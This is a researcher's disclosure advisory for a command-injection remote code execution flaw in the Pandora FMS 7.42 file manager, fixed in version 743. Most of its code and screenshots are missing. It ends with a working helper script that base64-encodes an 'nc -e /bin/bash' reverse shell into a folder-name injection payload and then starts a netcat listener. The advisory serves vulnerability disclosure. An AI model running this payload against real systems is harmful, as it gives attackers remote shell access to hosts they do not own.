Back to the advisories

Pandora FMS 7.42 <= Remote Code Execution Vulnerability in the File Manager.

If you find it valuable, you can support me by making a donation. Donate now.

Demo Video

General Information

I reported it to NVD/MITRE and the vendor accepted it as a vulnerability. It is fixed in the Pandora FMS 743 version.

Prerequisites to exploit the vulnerability

1. The PHP fileinfo must be disabled on the Host
2. Admin account is necessary to Access the File Manager

Technical Details

Searching for a vulnerability ...

I checked the source code of Pandora FMS and I searched for dangerous functions like exec. I found an interesting exec function call in pandora_console/include/functions_filemanager.php. The important function was:

This function has a $filename parameter and this parameter normally is a file or a folder name.

• The function cuts the extension part of the parameter and checks is it in the predefined $mime_types array or not.
• If it is not a known extension, then it checks the extension with the "finfo_open" function, if it is available.
• If finfo_open is not available, it calls the exec function with the given parameter.

This finfo_open function is part of the PHP Fileinfo extension (PHP Fileinfo Documentation). There are cases when this extension is disabled, so I disabled it in my test environment. I edited the necessary configuration file:

I made the following test file:

I tested it liket this:

Find a way to execute my code via the File Manager from the browser

It was an iterative job.

1. I modified the source code and add additional logs to save the parameter of the mime_content_type function.
2. I saved the output to /tmp/filemanager.log.
3. In every iteration, I checked the log and tried to find a way to execute my code.

Notes

1. I made a simple test directory to reduce the number of the logs ("k44">).
2. Later the log was not necessary, because the relevant part was visible from the browser.
3. Anybody who visits the File Manager can trigger the code execution.
4. To trigger the code execution it is enough to visit the parent folder of the "tricky" folder.
5. At the end I restored the original source code.

Internal steps

I tried to create new directories in my k44 directory. If the directory creation was succeeded, then the new directory was visible in the file manager. e.g: the "k4m1ll0" directory:

Note: in this screenshot the older Pandora FMS instance was in use, but it works in the new environment too. I used it because it was easier to restore the VMware image during the test phase.

This form does not filter the input properly. There are characters which are not allowed by the HOST operating system, e.g: "/", but most of the characters are allowed by the Web Application.

The IP address of the Attacker machine was 192.168.0.60. I encoded the reverse shell command with base64.

I started a netcat listener.

The final payload was:

Proof:

Additional content

Helper Script

#!/bin/bash
clear
echo "######################################################"
echo "### PandoraFMS Filemanager RCE v1.0"
echo "### Author: k4m1ll0"
echo "### Date: 2019.12.28."
echo "######################################################"

#### SETTINGS ##############################################"
IP="192.168.0.81"
PORT=9000
############################################################"

echo 'IP: ' "$IP" ', PORT: ' "$PORT"
ENCODED_COMMAND=`echo -n "nc -e /bin/bash $IP $PORT" | base64`
FINAL_COMMAND=";\`echo -n "$ENCODED_COMMAND" | base64 -d\`"

echo "Copy and paste the following line:"
echo $FINAL_COMMAND
nc -lvp "$PORT"
   

© 2019-2024 Kamilló Matek (k4m1ll0) All Rights Reserved